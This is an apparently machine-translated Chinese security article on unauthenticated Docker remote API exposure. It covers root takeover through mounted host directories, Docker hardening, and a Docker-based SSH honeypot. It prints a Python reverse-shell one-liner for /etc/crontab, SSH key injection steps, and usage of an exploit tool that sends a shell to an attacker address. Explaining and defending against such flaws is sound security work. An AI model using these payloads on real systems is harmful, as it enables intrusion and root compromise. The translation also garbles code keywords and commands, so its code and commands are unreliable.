注：本文为“小米安全中心”原作者：netxfly  转载请联系“小米安全中心” 概述 众所周知，Docker守护进程默认侦听unix套接字，例如unix: ///var/run/docker.sock。 该官员还提供了一个Rustful api接口，允许通过TCP远程访问Docker。例如，执行以下启动参数允许docker在所有本地地址上侦听端口2375： Dockerd -H=0.0.0.0: 2375 -H unix: ///var/run/docker.sock 然后，您可以使用docker客户端或任何http客户端远程访问它： $ curlhttp://10.10.10.10: 2375/containers/json [] Docker -H=tcp: //10.10.10.10: 2375 ps     容器ID    图像       命令      创建      状态       端口       名称 但是在没有任何访问控制的情况下启用此Docker远程API服务非常危险，攻击者可以在发现后轻松获取整个服务器的权限。 攻击方法 Docker远程Api未经授权访问的攻击原理类似于之前的Redis未授权访问漏洞。它是通过将文件写入运行应用程序的服务器获得的，常用用法如下。 1.启动容器，挂载主机的/root /目录，然后将攻击者的ssh公钥〜/.ssh/id_rsa.pub的内容写入主机的/root/.ssh/authorized_keys文件。然后，您可以直接使用root帐户登录。 2，启动一个容器，挂载主机的/etc /目录，然后将shell shell脚本写入/etc/crontab，攻击者将获得一个反弹shell，其弹跳shell脚本如： Echo -e'*/1 * * * * root/usr/bin/python -c'import socket，subprocess，os; s=socket.socket（socket.AF_INET，socket.SOCK_STREAM）; s.connect（（\' 127.0.0.1 \”，8088））; os.dup2（s.fileno（），0）; os.dup2（s.fileno（），1）; os.dup2（s.fileno（），2）; p=subprocess.call（[\'/bin/sh \'，\' - i \']）;'\ n'＆gt;＆gt;/etc/crontab中 第二种使用方法也可以挂载var/spool/cron /目录，并将跳出shell的脚本写入/var/spool/cron/root（centos系统）或/var/spool/cron/crontabs/root（ ubuntu）系统）   互联网上有很多手动方法，所以我不会说太多。作者直接给出了自动化利用工具的go语言版本。 github地址是：https://github.com/netxfly/docker-remote-api-exp，用法如下： $ ./remote_api_exp 使用./remote_api_exp:   -pubkey string      id_rsa.pub文件（默认为'/root/.ssh/id_rsa.pub'）   -reverse string     反向地址，6.6.6.6: 8888   -target string      target ip，1.1.1.1: 2375   -type字符串     类型，如check，root，shell（默认'check'）   -version字符串      Docker版本:      ---------------------------      Docker版本  API版本      ---------------------------      1.12.x      1.24      1.11.x      1.23      1.10.x      1.22      1.9.x      1.21      1.8.x      1.20      1.7.x      1.19      1.6.x      1.18 （默认为'1.12'） 参数说明   1，/remote_api_exp -type=root -target=ip: 2375 -version=1.12.3，在/root/.ssh/authorized_keys中写入攻击者的ssh公钥 2，/remote_api_exp -type=check -target=ip: 2375，获取服务器信息，如操作系统，机器名，远程api版本和docker安装位置等。 3，/remote_api_exp -type=shell -target=ip: 2375 -version=1.12.3 -reverse=attackerIp: 8888，给攻击者一个shell     使用示例 1.以root身份登录   2.获得反弹的外壳   也许有些运营商认为这是因为监控器位于外部网络上，因此攻击者有机会进行攻击。如果我不监控外部网络，则不存在安全风险。实际上，内部网络存在以下安全风险： 外部网络攻击者可以通过WEB应用程序的SSRF漏洞间接攻击内部网络中未经授权的Docker远程api服务; 方便已经进入内网的攻击者扩大攻击范围; 它可能会受到内部别有用心的人的攻击，然后窃取敏感数据。 安全加固 如果没有必要，请不要启用docker的远程api服务。如果必须使用它，可以使用以下强化方法： 1，设置ACL，只允许可信源IP连接; 2，设置TLS认证，官方文件是Protect the Docker守护进程套接字 生成客户端 - 服务器通信证书后，可以使用以下命令启动docker守护程序： Docker -d --tlsverify --tlscacert=ca.pem --tlscert=server-cert.pem --tlskey=server-key.pem -H=tcp: //10.10.10.10: 2375 -H unix: ///VAR /运行/docker.sock 客户端连接时，需要设置以下环境变量export DOCKER_TLS_VERIFY=1。 导出DOCKER_CERT_PATH=〜/.docker 导出DOCKER_HOST=tcp: //10.10.10.10: 2375 导出DOCKER_API_VERSION=1.12 安全建设 上面，我们回顾了docker远程api未授权访问认证的安全风险和使用方法。接下来，我们切换到安全构建的角度，使用docker remote api构建了一个具有自动弹性可伸缩性的ssh honeypot系统。 有许多安全从业者使用docker作为蜜罐的沙箱，但是存在一个常见问题：所有攻击者都连接到同一个沙箱，并且它们通常被放置在外部网络的沙箱中。攻击者可能在同一时间段内进入，他们可能会看到彼此的行为，以便通过蜜罐查看或干扰我们对日志的单独分析。 我们的愿景是允许所有攻击者使用独立的沙箱。当您来时，您将自动为您打开一个全新的沙箱，然后静默记录您的操作行为。离开后，您将自动销毁沙箱并预留资源以接收其他即将到来的黑客兄弟。 架构说明   该系统由Agent和Docker服务器组成。 docker服务器需要打开docker远程api服务。   代理可以部署在多个不同的节点上。通过检测本地ssh日志，确定是否存在破解行为。如果存在破解密码行为且超过3次，则将通过远程api接口在docker服务器中启动新容器。然后攻击者的流量被转发到此容器。   Agent运行的效果如下： 然后在docker服务器上，您可以通过ps命令查看新创建的ssh honeypot沙箱，如下所示： 具体实现 该系统由go语言实现，可以编译成单独的二进制文件。部署时，将二进制文件直接上传到相应的服务器并运行它。 程序启动时将加载配置文件。配置文件选项如下： 配置参数说明： 1，DOCKER_HOST是Docker服务器的IP 2，DOCKER_API是Docker远程api的地址 3，API_VERSION是Docker远程api的版本号 4，DOCKER_CERT是Docker的客户端证书 5，INTERFACE是为代理部署蜜罐的NIC的名称。 6，WHITE_IPLIST是白名单，无法防御这些源IP 7，MAX_HONEYPOTS，表示允许在Docker服务器中启动的最大容器数 8，sshd_log是Agent中本地openssh的日志目录（默认为/var/log） 配置文件处理的代码如下： Cache是一个map [string] * cache.Cache，它维护每个容器的状态，例如攻击者的IP，攻击者的数量和超时时间。 主程序的代码如下： 包主 进口（ 'XSEC-SSH-蜜罐/设置' 'XSEC-SSH-蜜罐/util的' ） Func main（）{ 去util.MonitorLog（settings.SshLog） util.Schedule（30） } 1，util.MonitorLog协程将监视代理的ssh日志并检测是否存在密码破解行为。 2，util.Schedule是一个常规任务，这里每30秒执行一次，每次完成以下任务： 1，刷新攻击流量传输策略 2，检查是否有超时攻击者的容器，如果关闭，则释放资源   MonitorLog的代码如下：   如果有新的ssh日志，它将由CheckSSH（logContent * tail.Line）函数处理。 CheckSSH（logContent * tail.Line）配置文件的代码如下： 该程序将在设置中保存每个攻击者的源IP。全局变量中的缓存，攻击次数和超时时间。如果攻击次数大于3，将为攻击者打开一个新容器，攻击者的流量将来自代理。直接转移到后端新打开的ssh honeypot。 攻击者到后端密码的流量是通过iptables实现的，有些代码如下所示： [注：本文为“小米安全中心”原作者：netxfly  小米安全中心安全脉冲结算账号发布]